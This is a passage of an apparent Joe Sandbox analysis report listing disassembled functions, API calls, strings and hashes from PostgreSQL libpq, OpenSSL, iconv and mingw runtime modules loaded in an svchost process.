                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                            • String ID:
                                                                                            • API String ID: 190073905-0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: PQrequestCancel() -- connection is not open$keepalives$keepalives_count$keepalives_idle$keepalives_interval$out of memory$tcp_user_timeout
                                                                                            • API String ID: 0-3338339123
                                                                                            APIs
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D3200
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D3280
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2D70: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$freelibintl_dgettextmalloc
                                                                                            • String ID: %s/%s$could not acquire SSPI credentials$duplicate SSPI authentication request$host name must be specified$kerberos$negotiate$out of memory
                                                                                            • API String ID: 1401199814-1896325366
                                                                                            APIs
                                                                                            • X509_get_subject_name.LIBCRYPTO-3-X64(?,?,00000001,00007FFDA360BDFE), ref: 00007FFDA360C4AC
                                                                                            • X509_NAME_dup.LIBCRYPTO-3-X64(?,?,00000001,00007FFDA360BDFE), ref: 00007FFDA360C4B9
                                                                                            • OPENSSL_sk_find.LIBCRYPTO-3-X64(?,?,00000001,00007FFDA360BDFE), ref: 00007FFDA360C4CC
                                                                                            • X509_NAME_free.LIBCRYPTO-3-X64(?,?,00000001,00007FFDA360BDFE), ref: 00007FFDA360C4D8
                                                                                            • OPENSSL_sk_push.LIBCRYPTO-3-X64(?,?,00000001,00007FFDA360BDFE), ref: 00007FFDA360C4E5
                                                                                            • OSSL_STORE_INFO_free.LIBCRYPTO-3-X64(?,?,00000001,00007FFDA360BDFE), ref: 00007FFDA360C4F1
                                                                                            • OSSL_STORE_eof.LIBCRYPTO-3-X64(?,?,00000001,00007FFDA360BDFE), ref: 00007FFDA360C4F9
                                                                                            • ERR_clear_error.LIBCRYPTO-3-X64(?,?,00000001,00007FFDA360BDFE), ref: 00007FFDA360C506
                                                                                            • X509_NAME_free.LIBCRYPTO-3-X64(?,?,00000001,00007FFDA360BDFE), ref: 00007FFDA360C510
                                                                                            • OSSL_STORE_close.LIBCRYPTO-3-X64(?,?,00000001,00007FFDA360BDFE), ref: 00007FFDA360C51B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: X509_$E_free$E_closeE_dupE_eofL_sk_findL_sk_pushO_freeR_clear_errorX509_get_subject_name
                                                                                            • String ID:
                                                                                            • API String ID: 2042042120-0
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno
                                                                                            • String ID: //IGNORE$//IGNORE$//TRANSL$//TRANSL$CP437
                                                                                            • API String ID: 2918714741-2468171555
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: strrchr$fwrite
                                                                                            • String ID: %$%.$*$0$NaN$e
                                                                                            • API String ID: 1053785018-1973797268
                                                                                            APIs
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36DB80E
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2D70: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$freelibintl_dgettext
                                                                                            • String ID: another command is already in progress$cannot queue commands during COPY$command string is a null pointer$no connection to the server$number of parameters must be between 0 and %d$statement name is a null pointer
                                                                                            • API String ID: 3960679934-1309384198
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno
                                                                                            • String ID: could not open file "%s": %s$could not write to file "%s": %s
                                                                                            • API String ID: 2918714741-749339701
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36EC3B0: Sleep.KERNEL32(?,?,?,00007FFDA36E2E38,?,?,?,?,00007FFDA36E2C5E,?,?,?,00007FFDA36D1068), ref: 00007FFDA36EC3D2
                                                                                              • Part of subcall function 00007FFDA36EC3B0: InitializeCriticalSection.KERNEL32(?,?,?,00007FFDA36E2E38,?,?,?,?,00007FFDA36E2C5E,?,?,?,00007FFDA36D1068), ref: 00007FFDA36EC3F0
                                                                                              • Part of subcall function 00007FFDA36EC3B0: EnterCriticalSection.KERNEL32(?,?,?,00007FFDA36E2E38,?,?,?,?,00007FFDA36E2C5E,?,?,?,00007FFDA36D1068), ref: 00007FFDA36EC406
                                                                                            • BIO_meth_free.LIBCRYPTO-3-X64 ref: 00007FFDA36E9A1D
                                                                                            • ERR_new.LIBCRYPTO-3-X64 ref: 00007FFDA36E9A2E
                                                                                            • ERR_set_debug.LIBCRYPTO-3-X64 ref: 00007FFDA36E9A46
                                                                                            • ERR_set_error.LIBCRYPTO-3-X64 ref: 00007FFDA36E9A57
                                                                                            • ERR_new.LIBCRYPTO-3-X64 ref: 00007FFDA36E9A96
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalR_newSection$EnterInitializeO_meth_freeR_set_debugR_set_errorSleep
                                                                                            • String ID: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\src\interfaces\libpq\fe-secure-openssl.c$libpq socket$my_SSL_set_fd
                                                                                            • API String ID: 1673460624-3482463761
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast_errno$_time64libintl_dgettextselect
                                                                                            • String ID: %s() failed: %s$invalid socket$select$show password_encryption
                                                                                            • API String ID: 577054053-1435312234
                                                                                            • Opcode ID: 41b78291d39fa47844300f65c087e57bdd3a7a51bd038fc3e801bd270b690a37
                                                                                            • Instruction ID: 688373c8a5cd082e8dd77dd1aa8d4f5ae04db5f4e951321c865412d6762167b0
                                                                                            • Opcode Fuzzy Hash: 41b78291d39fa47844300f65c087e57bdd3a7a51bd038fc3e801bd270b690a37
                                                                                            • Instruction Fuzzy Hash: DE41C232B0EAC281F6608F10E4607BA7292FB80754F6C2235EA5D677D6DF3ED4498708
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputcisprint
                                                                                            • String ID: %c$ %d$ \x%02x$CopyOutResponse$Flush$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 3787447051-3121233105
                                                                                            • Opcode ID: 33fc0a5aa4d03cdc5568adbe1cd14efd1a5f6c3de81a4a7ac237bc0d4d81df2e
                                                                                            • Instruction ID: 1508a5619978eafa486f15abce0b3a8603a60b4dda3edc1997917a170e63a7e7
                                                                                            • Opcode Fuzzy Hash: 33fc0a5aa4d03cdc5568adbe1cd14efd1a5f6c3de81a4a7ac237bc0d4d81df2e
                                                                                            • Instruction Fuzzy Hash: 7221ADA2B1B29641FA10DB15E4617B92363AF407C8F487131DA4E27347CE7FE449D308
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputcisprint
                                                                                            • String ID: "%s"$ %c$ \x%02x$Close$CommandComplete$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 3787447051-3282132963
                                                                                            • Opcode ID: 335db59d4bed4dd53630f86e513deae1dc4d565af52ecbb3b73c7182e78e2bfd
                                                                                            • Instruction ID: f933a2d7ed5b3be825f86bc2770fa0e3fa974a3121f8feba2dc22e0fc02c0670
                                                                                            • Opcode Fuzzy Hash: 335db59d4bed4dd53630f86e513deae1dc4d565af52ecbb3b73c7182e78e2bfd
                                                                                            • Instruction Fuzzy Hash: 7F219F62B1B68682FA10DB55E4616F92363AF407C8F8C6132DA0E23357CF6EF549D318
                                                                                            APIs
                                                                                            • ERR_new.LIBCRYPTO-3-X64(?,?,?,00007FFDA3619B10,?,00007FFDA3602E95), ref: 00007FFDA361C38E
                                                                                            • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00007FFDA3619B10,?,00007FFDA3602E95), ref: 00007FFDA361C3A6
                                                                                            • ERR_set_error.LIBCRYPTO-3-X64(?,?,?,00007FFDA3619B10,?,00007FFDA3602E95), ref: 00007FFDA361C3B7
                                                                                            • ERR_new.LIBCRYPTO-3-X64(?,?,?,00007FFDA3619B10,?,00007FFDA3602E95), ref: 00007FFDA361C3D0
                                                                                            • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00007FFDA3619B10,?,00007FFDA3602E95), ref: 00007FFDA361C3E8
                                                                                            • ERR_set_error.LIBCRYPTO-3-X64(?,?,?,00007FFDA3619B10,?,00007FFDA3602E95), ref: 00007FFDA361C3F9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                            • String ID: can_renegotiate$ssl\ssl_lib.c
                                                                                            • API String ID: 1552677711-867855671
                                                                                            • Opcode ID: 3a1675180e72825a1a9c0467388758be2d6c99f26fcfcb73c7b2ad0611180d60
                                                                                            • Instruction ID: 34b081976d109f23f3919d93b9c3b855d105c07b6bc3cc41267e03acfe449b02
                                                                                            • Opcode Fuzzy Hash: 3a1675180e72825a1a9c0467388758be2d6c99f26fcfcb73c7b2ad0611180d60
                                                                                            • Instruction Fuzzy Hash: 3E116165F0A14287F784EB24C8A27ED2653EB54740F987072D54CA37D3CE2EE58A8609
                                                                                            APIs
                                                                                            • ERR_peek_last_error.LIBCRYPTO-3-X64(?,?,?,?,00007FFDA363F9FC), ref: 00007FFDA364E63C
                                                                                            • ERR_pop_to_mark.LIBCRYPTO-3-X64(?,?,?,?,00007FFDA363F9FC), ref: 00007FFDA364E64C
                                                                                            • ERR_clear_last_mark.LIBCRYPTO-3-X64(?,?,?,?,00007FFDA363F9FC), ref: 00007FFDA364E653
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_clear_last_markR_peek_last_errorR_pop_to_mark
                                                                                            • String ID:
                                                                                            • API String ID: 4503806-0
                                                                                            • Opcode ID: 1653e883ae788b22098aff78b098f66b5393b0d98448a3d5c585c9e523f4069e
                                                                                            • Instruction ID: a5a5f90f6ecdfffc643a3b8295f710dbcd7799d1d123949d10ce67bd4cecbd16
                                                                                            • Opcode Fuzzy Hash: 1653e883ae788b22098aff78b098f66b5393b0d98448a3d5c585c9e523f4069e
                                                                                            • Instruction Fuzzy Hash: 7351E626B0BB8182F6609B15A96037E73A6FF49B84F482135EE5D63786DF3ED411C708
                                                                                            APIs
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D25E7
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D2621
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2D70: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            Strings
                                                                                            • fe_sendauth: error in SASL authentication, xrefs: 00007FFDA36D2711
                                                                                            • out of memory allocating SASL buffer (%d), xrefs: 00007FFDA36D25F8
                                                                                            • no client response found after SASL exchange success, xrefs: 00007FFDA36D26B8
                                                                                            • AuthenticationSASLFinal received from server, but SASL authentication was not completed, xrefs: 00007FFDA36D2699
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$freelibintl_dgettextmalloc
                                                                                            • String ID: AuthenticationSASLFinal received from server, but SASL authentication was not completed$fe_sendauth: error in SASL authentication$no client response found after SASL exchange success$out of memory allocating SASL buffer (%d)
                                                                                            • API String ID: 1401199814-242416509
                                                                                            • Opcode ID: fb1d9456ba725ec95725673f9ffa0fb8971886aa7ff2690fc2b69333031c660f
                                                                                            • Instruction ID: 26d3e4643506909085cdaf9366257bebbdbf6f52430d27abddb7549a977fd4f1
                                                                                            • Opcode Fuzzy Hash: fb1d9456ba725ec95725673f9ffa0fb8971886aa7ff2690fc2b69333031c660f
                                                                                            • Instruction Fuzzy Hash: B0419B2270EB8282FAA49B51F4641B96362FB85BC0F582032DE4D13796DF2FD5558708
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: strncmp
                                                                                            • String ID: /c/tmp/iconv-117
                                                                                            • API String ID: 1114863663-2940094699
                                                                                            • Opcode ID: 470f3b171a377214d98a476e199219cf95402c31d2bb5ef18a45091ad314cac6
                                                                                            • Instruction ID: 789a603f564db672fa6f341e4903ee9751b3dc21a6bd9ca21f49848c12b3f101
                                                                                            • Opcode Fuzzy Hash: 470f3b171a377214d98a476e199219cf95402c31d2bb5ef18a45091ad314cac6
                                                                                            • Instruction Fuzzy Hash: B121B06072965842EE049BE7AC1035BDF96BB86BCCF84547ACD1817340DB3ED546C340
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: O_set_flags$O_set_retry_reason$O_clear_flagsO_get_retry_reasonR_newR_set_debugR_set_error
                                                                                            • String ID:
                                                                                            • API String ID: 2280207033-0
                                                                                            • Opcode ID: 10c884e75fcfe5a2a25692e56033b3c920e493be710e4c608bc273895a24d886
                                                                                            • Instruction ID: ff63c7ef237f8cc067ff9e7b41840893a5f2948031c75fbf3e272f082b01bab7
                                                                                            • Opcode Fuzzy Hash: 10c884e75fcfe5a2a25692e56033b3c920e493be710e4c608bc273895a24d886
                                                                                            • Instruction Fuzzy Hash: EA114F21F0E01243F926A1A6553627D8A538F8BB80F28A031EC5D6BB97CD2FE643030D
                                                                                            APIs
                                                                                            Strings
                                                                                            • Mingw-w64 runtime failure:, xrefs: 66016948
                                                                                            • Address %p has no image-section, xrefs: 66016980, 66016AD5
                                                                                            • VirtualProtect failed with code 0x%x, xrefs: 66016A9E
                                                                                            • VirtualQuery failed for %d bytes at address %p, xrefs: 66016AC1
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryVirtual
                                                                                            • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                                            • API String ID: 1804819252-1534286854
                                                                                            • Opcode ID: d80b61cc859d10f00418dba48bc183b6d0d3a1d9ea1f4be7519bb695494f032f
                                                                                            • Instruction ID: 3180ed475d689572c398daea22f15be179196ef56f300b5d752254db8308fd30
                                                                                            • Opcode Fuzzy Hash: d80b61cc859d10f00418dba48bc183b6d0d3a1d9ea1f4be7519bb695494f032f
